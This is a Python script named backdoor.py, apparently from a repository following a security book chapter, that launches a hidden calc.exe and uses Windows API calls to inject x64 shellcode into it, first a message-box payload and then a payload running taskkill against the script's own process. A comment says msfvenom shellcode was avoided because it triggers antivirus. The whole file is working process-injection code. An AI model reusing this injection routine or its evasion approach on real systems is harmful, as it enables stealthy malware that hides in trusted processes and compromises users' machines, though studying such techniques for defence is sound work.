-
Notifications
You must be signed in to change notification settings - Fork 0
/
backdoor.py
129 lines (107 loc) · 6.68 KB
/
backdoor.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
# This library is from Chapter 3 and contains all the necessary
# defines for process creation that we need
import sys
from ctypes import *
from win_defines import *
kernel32 = windll.kernel32
# This is the original executable
path_to_exe = "C:\\calc.exe"
startupinfo = STARTUPINFO()
process_information = PROCESS_INFORMATION()
creation_flags = CREATE_NEW_CONSOLE
startupinfo.dwFlags = 0x1
startupinfo.wShowWindow = 0x0
startupinfo.cb = sizeof(startupinfo)
# First things first, fire up that second process
# and store it's PID so that we can do our injection
kernel32.CreateProcessA(path_to_exe,
None,
None,
None,
None,
creation_flags,
None,
None,
byref(startupinfo),
byref(process_information))
pid = process_information.dwProcessId
def inject(pid, data, parameter=0):
# Get a handle to the process we are injecting into.
h_process = kernel32.OpenProcess( PROCESS_ALL_ACCESS, False, int(pid) )
if not h_process:
print "[*] Couldn't acquire a handle to PID: %s" % pid
sys.exit(0)
kernel32.VirtualAllocEx.argtypes = [HANDLE, LPVOID, SIZE_T, DWORD, DWORD]
kernel32.VirtualAllocEx.restype = LPVOID
arg_address = kernel32.VirtualAllocEx( h_process, 0, len(data), VIRTUAL_MEM, PAGE_READWRITE)
if not arg_address:
raise WinError()
print "[*] alloc address: 0x%08x" % arg_address
written = c_ulonglong(0)
kernel32.WriteProcessMemory.argtypes = [HANDLE, LPVOID, LPVOID, SIZE_T, POINTER(SIZE_T)]
kernel32.WriteProcessMemory.restype = bool
if not kernel32.WriteProcessMemory(h_process, arg_address, data, len(data), byref(written)):
raise WinError()
thread_id = DWORD()
if not parameter:
start_address = arg_address
else:
kernel32.GetModuleHandleA.argtypes = [LPSTR]
kernel32.GetModuleHandleA.restype = HMODULE
h_kernel32 = kernel32.GetModuleHandleA("kernel32.dll")
start_address = kernel32.GetProcAddress(h_kernel32, "LoadLibraryA")
parameter = arg_address
kernel32.CreateRemoteThread.argtypes = [HANDLE, LPSECURITY_ATTRIBUTES, SIZE_T, LPVOID, LPVOID, DWORD, LPDWORD]
kernel32.CreateRemoteThread.restype = HANDLE
if not kernel32.CreateRemoteThread(h_process, None, 0, start_address, parameter, 0, byref(thread_id)):
raise WinError()
return True
# Now we have to climb out of the process we are in and kill ourselves
msgbox_shellcode = \
"\x48\x83\xEC\x28\x48\x83\xE4\xF0\x48\x8D\x15\x66\x00\x00\x00\x48\x8D\x0D\x52\x00\x00\x00\xE8\x9D\x00" \
"\x00\x00\x4C\x8B\xF8\x48\x8D\x0D\x5D\x00\x00\x00\xFF\xD0\x48\x8D\x15\x5F\x00\x00\x00\x48\x8D\x0D\x4D" \
"\x00\x00\x00\xE8\x7E\x00\x00\x00\x4D\x33\xC9\x4C\x8D\x05\x61\x00\x00\x00\x48\x8D\x15\x4E\x00\x00\x00" \
"\x48\x33\xC9\xFF\xD0\x48\x8D\x15\x56\x00\x00\x00\x48\x8D\x0D\x0A\x00\x00\x00\xE8\x55\x00\x00\x00\x48" \
"\x33\xC9\xFF\xD0\x4B\x45\x52\x4E\x45\x4C\x33\x32\x2E\x44\x4C\x4C\x00\x4C\x6F\x61\x64\x4C\x69\x62\x72" \
"\x61\x72\x79\x41\x00\x55\x53\x45\x52\x33\x32\x2E\x44\x4C\x4C\x00\x4D\x65\x73\x73\x61\x67\x65\x42\x6F" \
"\x78\x41\x00\x48\x65\x6C\x6C\x6F\x20\x77\x6F\x72\x6C\x64\x00\x4D\x65\x73\x73\x61\x67\x65\x00\x45\x78" \
"\x69\x74\x54\x68\x72\x65\x61\x64\x00\x48\x83\xEC\x28\x65\x4C\x8B\x04\x25\x60\x00\x00\x00\x4D\x8B\x40" \
"\x18\x4D\x8D\x60\x10\x4D\x8B\x04\x24\xFC\x49\x8B\x78\x60\x48\x8B\xF1\xAC\x84\xC0\x74\x26\x8A\x27\x80" \
"\xFC\x61\x7C\x03\x80\xEC\x20\x3A\xE0\x75\x08\x48\xFF\xC7\x48\xFF\xC7\xEB\xE5\x4D\x8B\x00\x4D\x3B\xC4" \
"\x75\xD6\x48\x33\xC0\xE9\xA8\x00\x00\x00\x49\x8B\x58\x30\x44\x8B\x4B\x3C\x4C\x03\xCB\x49\x81\xC1\x88" \
"\x00\x00\x00\x45\x8B\x29\x4D\x85\xED\x75\x08\x48\x33\xC0\xE9\x86\x00\x00\x00\x4D\x8D\x44\x1D\x00\x45" \
"\x8B\x71\x04\x4D\x03\xF5\x41\x8B\x48\x18\x45\x8B\x50\x20\x4C\x03\xD3\xFF\xC9\x4D\x8D\x0C\x8A\x41\x8B" \
"\x39\x48\x03\xFB\x48\x8B\xF2\xA6\x75\x08\x8A\x06\x84\xC0\x74\x09\xEB\xF5\xE2\xE6\x48\x33\xC0\xEB\x4E" \
"\x45\x8B\x48\x24\x4C\x03\xCB\x66\x41\x8B\x0C\x49\x45\x8B\x48\x1C\x4C\x03\xCB\x41\x8B\x04\x89\x49\x3B" \
"\xC5\x7C\x2F\x49\x3B\xC6\x73\x2A\x48\x8D\x34\x03\x48\x8D\x7C\x24\x30\x4C\x8B\xE7\xA4\x80\x3E\x2E\x75" \
"\xFA\xA4\xC7\x07\x44\x4C\x4C\x00\x49\x8B\xCC\x41\xFF\xD7\x49\x8B\xCC\x48\x8B\xD6\xE9\x13\xFF\xFF\xFF" \
"\x48\x03\xC3\x48\x83\xC4\x28\xC3"
inject( pid, msgbox_shellcode )
# adapted from http://mcdermottcybersecurity.com/articles/windows-x64-shellcode
# msfvenom generated shellcode triggers AV
our_pid = str(kernel32.GetCurrentProcessId())
process_killer_shellcode = \
"\x48\x83\xEC\x28\x48\x83\xE4\xF0\x48\x8D\x15\x57\x00\x00\x00\x48\x8D\x0D\x43\x00\x00\x00\xE8\x97" \
"\x00\x00\x00\x4C\x8B\xF8\x48\x8D\x15\x4E\x00\x00\x00\x48\x8D\x0D\x2D\x00\x00\x00\xE8\x81\x00\x00" \
"\x00\x48\xC7\xC2\x00\x00\x00\x00\x48\x8D\x0D\x3C\x00\x00\x00\xFF\xD0\x48\x8D\x15\x5F\x00\x00\x00" \
"\x48\x8D\x0D\x0A\x00\x00\x00\xE8\x5E\x00\x00\x00\x48\x33\xC9\xFF\xD0\x4B\x45\x52\x4E\x45\x4C\x33" \
"\x32\x2E\x44\x4C\x4C\x00\x4C\x6F\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\x00\x57\x69\x6E\x45\x78" \
"\x65\x63\x00\x43\x3A\x5C\x57\x69\x6E\x64\x6F\x77\x73\x5C\x53\x79\x73\x74\x65\x6D\x33\x32\x5C\x74" \
"\x61\x73\x6B\x6B\x69\x6C\x6C\x2E\x65\x78\x65\x20\x2F\x70\x69\x64\x20\x41\x41\x41\x41\x41\x00\x45" \
"\x78\x69\x74\x54\x68\x72\x65\x61\x64\x00\x48\x83\xEC\x28\x65\x4C\x8B\x04\x25\x60\x00\x00\x00\x4D" \
"\x8B\x40\x18\x4D\x8D\x60\x10\x4D\x8B\x04\x24\xFC\x49\x8B\x78\x60\x48\x8B\xF1\xAC\x84\xC0\x74\x26" \
"\x8A\x27\x80\xFC\x61\x7C\x03\x80\xEC\x20\x3A\xE0\x75\x08\x48\xFF\xC7\x48\xFF\xC7\xEB\xE5\x4D\x8B" \
"\x00\x4D\x3B\xC4\x75\xD6\x48\x33\xC0\xE9\xA8\x00\x00\x00\x49\x8B\x58\x30\x44\x8B\x4B\x3C\x4C\x03" \
"\xCB\x49\x81\xC1\x88\x00\x00\x00\x45\x8B\x29\x4D\x85\xED\x75\x08\x48\x33\xC0\xE9\x86\x00\x00\x00" \
"\x4D\x8D\x44\x1D\x00\x45\x8B\x71\x04\x4D\x03\xF5\x41\x8B\x48\x18\x45\x8B\x50\x20\x4C\x03\xD3\xFF" \
"\xC9\x4D\x8D\x0C\x8A\x41\x8B\x39\x48\x03\xFB\x48\x8B\xF2\xA6\x75\x08\x8A\x06\x84\xC0\x74\x09\xEB" \
"\xF5\xE2\xE6\x48\x33\xC0\xEB\x4E\x45\x8B\x48\x24\x4C\x03\xCB\x66\x41\x8B\x0C\x49\x45\x8B\x48\x1C" \
"\x4C\x03\xCB\x41\x8B\x04\x89\x49\x3B\xC5\x7C\x2F\x49\x3B\xC6\x73\x2A\x48\x8D\x34\x03\x48\x8D\x7C" \
"\x24\x30\x4C\x8B\xE7\xA4\x80\x3E\x2E\x75\xFA\xA4\xC7\x07\x44\x4C\x4C\x00\x49\x8B\xCC\x41\xFF\xD7" \
"\x49\x8B\xCC\x48\x8B\xD6\xE9\x13\xFF\xFF\xFF\x48\x03\xC3\x48\x83\xC4\x28\xC3"
padding = 5 - ( len( our_pid ))
replace_value = our_pid + ( "\x00" * padding )
replace_string= "\x41" * 5
process_killer_shellcode = process_killer_shellcode.replace( replace_string, replace_value )
# Pop the process killing shellcode in
inject(our_pid, process_killer_shellcode)